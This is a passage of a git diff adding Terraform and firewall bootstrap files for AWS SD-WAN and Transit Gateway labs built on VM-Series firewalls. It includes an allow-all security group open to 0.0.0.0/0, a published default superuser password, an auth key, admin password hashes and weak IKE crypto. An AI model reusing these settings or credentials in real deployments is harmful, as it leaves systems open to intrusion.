+    device_index         = 2
+    network_interface_id = "${aws_network_interface.branch50-fw-wan2.id}"
+  }
+
+  network_interface {
+    device_index         = 3
+    network_interface_id = "${aws_network_interface.branch50-fw-branch50.id}"
+  }
+
+  network_interface {
+    device_index         = 4
+    network_interface_id = "${aws_network_interface.branch50-fw-mpls.id}"
+  }
+  user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", "${aws_s3_bucket.branch50-fw-bootstrap-bucket.bucket}")))}"
+}
diff --git a/aws/sdwan-lab/hub-fw-bootstrap.tf b/aws/sdwan-lab/hub-fw-bootstrap.tf
new file mode 100644
index 00000000..6122d4ab
--- /dev/null
+++ b/aws/sdwan-lab/hub-fw-bootstrap.tf
@@ -0,0 +1,56 @@
+# Create a BootStrap S3 Bucket
+
+resource "random_id" "hub-fw-bucket_prefix" {
+  byte_length = 4
+}
+
+resource "aws_s3_bucket" "hub-fw-bootstrap-bucket" {
+  #hub-fw-bucket_prefix = "${var.hub-fw-bucket_prefix}"
+  bucket        = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+  acl           = "private"
+  force_destroy = true
+
+  tags {
+    Name = "hub-fw-bootstrap-bucket"
+  }
+}
+
+#resource "aws_s3_bucket_object" "hub-fw-bootstrap_xml" {
+#  depends_on = ["aws_s3_bucket.hub-fw-bootstrap-bucket"]
+#  bucket     = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+#  acl        = "private"
+#  key        = "config/bootstrap.xml"
+#  source     = "/dev/null"
+#}
+
+resource "aws_s3_bucket_object" "hub-fw-init-cft_txt" {
+  bucket     = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.hub-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "config/init-cfg.txt"
+  source     = "hub-fw-bootstrap/init-cfg.txt"
+}
+
+resource "aws_s3_bucket_object" "hub-fw-software" {
+  bucket     = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.hub-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "software/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "hub-fw-license" {
+  bucket     = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.hub-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "license/"
+  source     = "/dev/null"
+}
+
+resource "aws_s3_bucket_object" "hub-fw-content" {
+  bucket     = "hub-fw-${lower(random_id.hub-fw-bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.hub-fw-bootstrap-bucket"]
+  acl        = "private"
+  key        = "content/"
+  source     = "/dev/null"
+}
diff --git a/aws/sdwan-lab/hub-fw-bootstrap/init-cfg.txt b/aws/sdwan-lab/hub-fw-bootstrap/init-cfg.txt
new file mode 100644
index 00000000..ee4b3c1f
--- /dev/null
+++ b/aws/sdwan-lab/hub-fw-bootstrap/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+vm-auth-key=649475581476015
+panorama-server=52.35.104.230
+panorama-server-2=
+tplname=tgw-vpc-az1-stack
+dgname=tgw-vpc-az1
+dns-primary=
+dns-secondary=
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
\ No newline at end of file
diff --git a/aws/sdwan-lab/hub-fw.tf b/aws/sdwan-lab/hub-fw.tf
new file mode 100644
index 00000000..cdbae84c
--- /dev/null
+++ b/aws/sdwan-lab/hub-fw.tf
@@ -0,0 +1,139 @@
+resource "aws_iam_role" "hub-fw-bootstraprole" {
+  name = "hub-fw-bootstraprole-${random_id.sdwan.hex}"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "hub-fw-bootstrappolicy" {
+  name = "hub-fw-bootstrappolicy-${random_id.sdwan.hex}"
+  role = "${aws_iam_role.hub-fw-bootstraprole.id}"
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.hub-fw-bootstrap-bucket.bucket}"
+    },
+    {
+    "Effect": "Allow",
+    "Action": "s3:GetObject",
+    "Resource": "arn:aws:s3:::${aws_s3_bucket.hub-fw-bootstrap-bucket.bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "hub-fw-bootstrapinstanceprofile" {
+  name = "hub-fw-bootstrapinstanceprofile${random_id.sdwan.hex}"
+  role = "${aws_iam_role.hub-fw-bootstraprole.name}"
+  path = "/"
+}
+
+resource "aws_network_interface" "hub-fw-mgt" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = true
+  private_ips       = ["100.64.0.254"]
+}
+
+resource "aws_network_interface" "hub-fw-wan3" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN3.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.3.254"]
+}
+
+resource "aws_network_interface" "hub-fw-wan4" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN4.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.4.254"]
+}
+
+resource "aws_network_interface" "hub-fw-hub" {
+  subnet_id         = "${aws_subnet.SD-WAN-Hub.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.255.254"]
+}
+
+resource "aws_network_interface" "hub-fw-mpls" {
+  subnet_id         = "${aws_subnet.SD-WAN-MPLS.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.5.254"]
+}
+
+resource "aws_eip_association" "hub-fw-mgt-Association" {
+  network_interface_id = "${aws_network_interface.hub-fw-mgt.id}"
+  allocation_id        = "${aws_eip.hub-fw-mgt.id}"
+}
+
+#Deploys the firewalls
+
+resource "aws_instance" "hub-fw" {
+  tags {
+    Name = "Hub-fw"
+  }
+
+  disable_api_termination = false
+
+  iam_instance_profile = "${aws_iam_instance_profile.hub-fw-bootstrapinstanceprofile.name}"
+  ebs_optimized        = true
+  ami                  = "${var.SD-WAN-HUB-FW}"
+  instance_type        = "m5.4xlarge"
+  depends_on           = ["aws_internet_gateway.SDWAN-IGW"]
+
+  ebs_block_device {
+    device_name           = "/dev/xvda"
+    volume_type           = "gp2"
+    delete_on_termination = true
+    volume_size           = 60
+  }
+
+  key_name   = "${var.ServerKeyName}"
+  monitoring = false
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.hub-fw-mgt.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.hub-fw-wan3.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.hub-fw-wan4.id}"
+  }
+
+  network_interface {
+    device_index         = 3
+    network_interface_id = "${aws_network_interface.hub-fw-hub.id}"
+  }
+
+  network_interface {
+    device_index         = 4
+    network_interface_id = "${aws_network_interface.hub-fw-mpls.id}"
+  }
+  user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", "${aws_s3_bucket.hub-fw-bootstrap-bucket.bucket}")))}"
+}
diff --git a/aws/sdwan-lab/internet-gateway.tf b/aws/sdwan-lab/internet-gateway.tf
new file mode 100644
index 00000000..56d977ca
--- /dev/null
+++ b/aws/sdwan-lab/internet-gateway.tf
@@ -0,0 +1,7 @@
+resource "aws_internet_gateway" "SDWAN-IGW" {
+  vpc_id = "${aws_vpc.SDWAN.id}"
+
+  tags {
+    Name = "SDWAN-IGW"
+  }
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/public-ips.tf b/aws/sdwan-lab/public-ips.tf
new file mode 100644
index 00000000..d5d0bc26
--- /dev/null
+++ b/aws/sdwan-lab/public-ips.tf
@@ -0,0 +1,19 @@
+resource "aws_eip" "panorama-mgt" {
+  vpc   = true
+  depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
+}
+
+resource "aws_eip" "hub-fw-mgt" {
+  vpc   = true
+  depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
+}
+
+resource "aws_eip" "branch25-fw-mgt" {
+  vpc   = true
+  depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
+}
+
+resource "aws_eip" "branch50-fw-mgt" {
+  vpc   = true
+  depends_on = ["aws_vpc.SDWAN", "aws_internet_gateway.SDWAN-IGW"]
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/route-tables.tf b/aws/sdwan-lab/route-tables.tf
new file mode 100644
index 00000000..3c64ff82
--- /dev/null
+++ b/aws/sdwan-lab/route-tables.tf
@@ -0,0 +1,19 @@
+# Route Tables
+resource "aws_route_table" "public" {
+  vpc_id = "${aws_vpc.SDWAN.id}"
+
+  tags {
+    Name = "Public"
+  }
+
+  route {
+    cidr_block = "0.0.0.0/0"
+    gateway_id = "${aws_internet_gateway.SDWAN-IGW.id}"
+  }
+}
+# Association
+
+resource "aws_route_table_association" "mgt" {
+  subnet_id      = "${aws_subnet.SD-WAN-MGT.id}"
+  route_table_id = "${aws_route_table.public.id}"
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/security-groups.tf b/aws/sdwan-lab/security-groups.tf
new file mode 100644
index 00000000..1811a9f1
--- /dev/null
+++ b/aws/sdwan-lab/security-groups.tf
@@ -0,0 +1,22 @@
+resource "aws_security_group" "allow-all" {
+  name        = "allow-all"
+  description = "Wide open security group"
+  vpc_id      = "${aws_vpc.SDWAN.id}"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+  tags = {
+    Name = "allow-all"
+  }
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/servers.tf b/aws/sdwan-lab/servers.tf
new file mode 100644
index 00000000..69c5059b
--- /dev/null
+++ b/aws/sdwan-lab/servers.tf
@@ -0,0 +1,188 @@
+resource "aws_network_interface" "SD-WAN-Branch25-MGT" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.0.249"]
+}
+
+resource "aws_network_interface" "SD-WAN-Branch25-IWS" {
+  subnet_id         = "${aws_subnet.SD-WAN-Branch25.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.25.50"]
+}
+
+resource "aws_instance" "SD-WAN-Branch25-IWS" {
+  ami           = "${var.SD-WAN-BRANCH25-IWS}"
+  instance_type = "t2.large"
+  key_name      = "${var.ServerKeyName}"
+  monitoring    = false
+
+  tags {
+    Name = "SD-WAN-Branch25-IWS"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.SD-WAN-Branch25-MGT.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.SD-WAN-Branch25-IWS.id}"
+  }
+}
+
+resource "aws_network_interface" "SD-WAN-Branch50-MGT" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.0.49"]
+}
+
+resource "aws_network_interface" "SD-WAN-Branch50-IWS" {
+  subnet_id         = "${aws_subnet.SD-WAN-Branch50.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.50.50"]
+}
+
+resource "aws_instance" "SD-WAN-Branch50-IWS" {
+  ami           = "${var.SD-WAN-BRANCH50-IWS}"
+  instance_type = "t2.large"
+  key_name      = "${var.ServerKeyName}"
+  monitoring    = false
+
+  tags {
+    Name = "SD-WAN-Branch50-IWS"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.SD-WAN-Branch50-MGT.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.SD-WAN-Branch50-IWS.id}"
+  }
+}
+
+resource "aws_network_interface" "SD-WAN-Hub-SVR-MGT" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.0.149"]
+}
+
+resource "aws_network_interface" "SD-WAN-Hub-SVR" {
+  subnet_id         = "${aws_subnet.SD-WAN-Hub.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.255.50"]
+}
+
+resource "aws_instance" "SD-WAN-Hub-SVR" {
+  ami           = "${var.SD-WAN-HUB-SVR}"
+  instance_type = "t2.large"
+  key_name      = "${var.ServerKeyName}"
+  monitoring    = false
+
+  tags {
+    Name = "SD-WAN-Hub-SVR"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.SD-WAN-Hub-SVR-MGT.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.SD-WAN-Hub-SVR.id}"
+  }
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-MGT" {
+  subnet_id         = "${aws_subnet.SD-WAN-MGT.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.0.100"]
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-WAN1" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN1.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.1.100"]
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-WAN2" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN2.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.2.100"]
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-WAN3" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN3.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.3.100"]
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-WAN4" {
+  subnet_id         = "${aws_subnet.SD-WAN-WAN4.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.4.100"]
+}
+
+resource "aws_network_interface" "SD-WAN-Router-Jitter-MPLS" {
+  subnet_id         = "${aws_subnet.SD-WAN-MPLS.id}"
+  security_groups   = ["${aws_security_group.allow-all.id}"]
+  source_dest_check = false
+  private_ips       = ["100.64.5.100"]
+}
+
+resource "aws_instance" "SD-WAN-Router-Jitter" {
+  # instance_initiated_shutdown_behavior = "stop"
+  ami           = "${var.SD-WAN-ROUTER-JITTER}"
+  instance_type = "m5.4xlarge"
+  key_name      = "${var.ServerKeyName}"
+  monitoring    = false
+
+  tags {
+    Name = "SD-WAN-Router-Jitter"
+  }
+
+  network_interface {
+    device_index         = 0
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-MGT.id}"
+  }
+
+  network_interface {
+    device_index         = 1
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-WAN1.id}"
+  }
+
+  network_interface {
+    device_index         = 2
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-WAN2.id}"
+  }
+
+  network_interface {
+    device_index         = 3
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-WAN3.id}"
+  }
+
+  network_interface {
+    device_index         = 4
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-WAN4.id}"
+  }
+
+  network_interface {
+    device_index         = 5
+    network_interface_id = "${aws_network_interface.SD-WAN-Router-Jitter-MPLS.id}"
+  }
+}
\ No newline at end of file
diff --git a/aws/sdwan-lab/terraform.tfvars b/aws/sdwan-lab/terraform.tfvars
new file mode 100644
index 00000000..faf2b961
--- /dev/null
+++ b/aws/sdwan-lab/terraform.tfvars
@@ -0,0 +1,39 @@
+aws_region = "eu-west-1"
+
+VPC-Name = "SDWAN01"
+
+SD-WAN-HUB-FW = "ami-06eb7061108f6fcb7"
+
+SD-WAN-HUB-SVR = "ami-04a91de248eab22ea"
+
+SD-WAN-ROUTER-JITTER = "ami-0228a0bb61ce54230"
+
+SD-WAN-BRANCH25-FW = "ami-06eb7061108f6fcb7"
+
+SD-WAN-BRANCH50-FW = "ami-06eb7061108f6fcb7"
+
+SD-WAN-BRANCH25-IWS = "ami-07e4d468a47905df3"
+
+SD-WAN-BRANCH50-IWS = "ami-0738f0192b2fc93ea"
+
+VPCCIDR = "100.64.0.0/16"
+
+SD-WAN-MGT = "100.64.0.0/24"
+
+SD-WAN-WAN1 = "100.64.1.0/24"
+
+SD-WAN-WAN2 = "100.64.2.0/24"
+
+SD-WAN-WAN3 = "100.64.3.0/24"
+
+SD-WAN-WAN4 = "100.64.4.0/24"
+
+SD-WAN-MPLS = "100.64.5.0/24"
+
+SD-WAN-Branch25 = "100.64.25.0/24"
+
+SD-WAN-Branch50 = "100.64.50.0/24"
+
+SD-WAN-Hub = "100.64.255.0/24"
+
+ServerKeyName = "AWS-Lab-Pair"
diff --git a/aws/sdwan-lab/vpc-subnets.tf b/aws/sdwan-lab/vpc-subnets.tf
new file mode 100644
index 00000000..1bfa39eb
--- /dev/null
+++ b/aws/sdwan-lab/vpc-subnets.tf
@@ -0,0 +1,112 @@
+provider "aws" {
+  region     = "${var.aws_region}"
+  #access_key = "${var.aws_access_key}"
+  #secret_key = "${var.aws_secret_key}"
+}
+
+# Declare the data sources
+data "aws_availability_zones" "available" {}
+
+resource "random_id" "sdwan" {
+  byte_length = 3
+}
+resource "aws_vpc" "SDWAN" {
+  cidr_block       = "${var.VPCCIDR}"
+  instance_tenancy = "default"
+
+  tags {
+    Name = "${var.VPC-Name}"
+  }
+}
+
+# Subnets
+resource "aws_subnet" "SD-WAN-MGT" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-MGT}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-MGT"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-WAN1" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-WAN1}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-WAN1"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-WAN2" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-WAN2}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-WAN2"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-WAN3" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-WAN3}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-WAN3"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-WAN4" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-WAN4}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-WAN4"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-MPLS" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-MPLS}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-MPLS"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-Branch25" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-Branch25}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-Branch25"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-Branch50" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-Branch50}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-Branch50"
+  }
+}
+
+resource "aws_subnet" "SD-WAN-Hub" {
+  vpc_id            = "${aws_vpc.SDWAN.id}"
+  cidr_block        = "${var.SD-WAN-Hub}"
+  availability_zone = "${data.aws_availability_zones.available.names[0]}"
+
+  tags {
+    Name = "SD-WAN-Hub"
+  }
+}
+
diff --git a/aws/tgw_2fw_vpc_insertion/README.md b/aws/tgw_2fw_vpc_insertion/README.md
new file mode 100644
index 00000000..173aabcf
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/README.md
@@ -0,0 +1,39 @@
+## 2 x VM-Series / Transit Gateway / 2 x Spokes VPCs
+This build is an iteration of [djspears build](https://github.com/wwce/terraform/tree/master/aws/TGW-VPC) that contains the following differences:
+1. Spoke-to-Internet traffic explicitly flows through firewall-1 (no SNAT).  
+2. Spoke-to-Spoke traffic explicitly flows through firewall-2 (no SNAT).
+3. Creation of dedicated route tables for each subnet (main route table is not used).
+
+## Overview
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/aws/tgw_2fw_vpc_insertion/images/diagram.png">
+</p>
+
+#### VM-Series Overview
+* Firewall-1 handles egress traffic to internet
+* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC
+* Both Firewalls can handle inbound traffic to the spokes
+* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment)
+
+#### S3 Buckets Overview
+* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration.
+* The buckets names have a random 30 string added to its name for global uniqueness `tgw-fw#-bootstrap-<randomString>`
+
+## Prerequistes 
+1. This Terraform build assumes the AWS CLI is installed on the machine doing the deploymnet [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html) .
+2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html).
+
+## How to Deploy
+1.  Download the **tgw_2fw_vpc_insertion** directory.
+2.  In an editor, open `variables.tf`
+    *  `Line 10`:  Set your existing AWS EC2 Key 
+    *  `Line 14`:  Enter a source address to access the VM-Series management interface (in valid CIDR notation).  This address will be added to the management interface's Network Security Group.
+    *  `Line 17`:  Uncomment either 'byol', 'payg1', or 'payg2'.  This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2).  
+3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in  `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`.  (Note: The authcode must be registered prior to deployment).
+4. After deployment, the firewalls' username and password are:
+     * **Username:** paloalto
+     * **Password:** PanPassword123!
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml
new file mode 100644
index 00000000..c9e19aeb
--- /dev/null
+++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml
@@ -0,0 +1,822 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk=</public-key>
+      </entry>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$oxidaogq$toVFt6xD7ruJnTHYeVftq1</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <interface-management-profile>allow-lambda</interface-management-profile>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-lambda">
+              <https>yes</https>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
